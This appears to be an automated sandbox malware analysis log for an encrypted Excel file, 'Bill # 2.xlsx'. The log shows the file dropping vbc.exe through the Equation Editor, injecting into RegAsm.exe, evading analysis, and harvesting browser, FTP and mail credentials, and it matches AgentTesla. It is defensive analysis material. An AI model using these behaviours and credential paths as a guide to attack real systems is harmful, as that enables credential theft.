                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00520C98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052AD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00525D90
                Source: Bill # 2.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: tochi[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@3/2
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Bill # 2.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE83C.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Bill # 2.xlsxVirustotal: Detection: 31%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Bill # 2.xlsxInitial sample: OLE indicators vbamacros = False
                Source: Bill # 2.xlsxInitial sample: OLE indicators encrypted = True
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00233860 pushfd ; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00231332 pushfd ; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00231390 pushfd ; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00520C40 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00521FF2 push eax; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00521BF0 push eax; retf 0022h
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8672821185
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8672821185
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: Bill # 2.xlsxStream path 'EncryptedPackage' entropy: 7.99819553665 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 597
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -480000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2752Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2860Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3000Thread sleep count: 597 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -58908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -56506s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -43402s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -39408s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -38316s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -34416s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -32700s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -30298s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -59594s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -58690s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -56100s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -55694s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -55008s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -54102s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -52792s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -52200s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -51700s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -51108s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -50608s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -36506s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -34104s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2196Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F01CB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.460000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: Yara matchFile source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.460000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

